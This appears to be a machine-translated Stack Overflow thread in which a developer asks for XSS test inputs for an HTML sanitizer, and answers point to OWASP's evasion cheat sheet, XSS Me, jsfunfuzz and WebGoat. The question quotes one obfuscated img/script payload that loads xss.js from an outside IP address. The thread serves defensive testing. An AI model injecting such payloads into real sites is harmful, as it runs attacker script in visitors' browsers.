18

私はhtmlサニタイザーを作成しようとしていますが、それが適切に機能することをテスト/証明するために、XSSの例のセットを使用して、それがどのように機能するかを確認する必要があります。これがコーディングホラーの良い例です

<img src=""http://www.a.com/a.jpg<script type=text/javascript 
src="http://1.2.3.4:81/xss.js">" /><<img 
src=""http://www.a.com/a.jpg</script>"

私は、Mimeデコーダーをテストするために使用される添付ファイル付きのいくつかのネストされた電子メールで構成されるMime Torture Testがあることを知っています(正しくデコードできる場合は、動作することが証明されています)。私は基本的にXSSに相当するものを探しています。つまり、正常に機能することを確認するために消毒剤に投げることができる危険なhtmlの例のリストです。

誰かがサニタイザーの書き方(つまり、人々が使用しようとしている一般的なエクスプロイトなど)についての優れたリソースもあれば、彼らも感謝しています。

前もって感謝します :-)

編集:これが以前に明確でなかった場合は申し訳ありませんが、私は一連の拷問テストの後で、ブラウザなどでテストするのではなく、消毒剤の単体テストを書くことができます。理論上のソースデータはどこからでも得られた可能性があります-ブラウザだけではありません。

4

4 に答える 4

18

このXSSチートリストを見てください:https ://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

于 2008-11-01T16:27:25.583 に答える
7

XSS Meは、サニタイザーに対して実行できる優れた Firefox プラグインです。

于 2008-11-01T16:29:12.507 に答える
2

Jesse Ruderman の jsfunfuzz ( http://www.squarefree.com/2007/08/02/introducing-jsfunfuzz/ ) を試すことができます。これは、Javascript にランダム データをスローして、Javascript を破壊しようとします。Firefox チームはこれを使用して大きな成功を収めたようです。

于 2008-11-01T16:37:20.447 に答える
2

OWASPをチェックしてください。XSS がどのように機能するか、何を探すべきか、さらには脆弱なサイトで手を試すことができるWebGoatプロジェクトについての優れたガイダンスがあります。

于 2008-11-01T16:33:37.787 に答える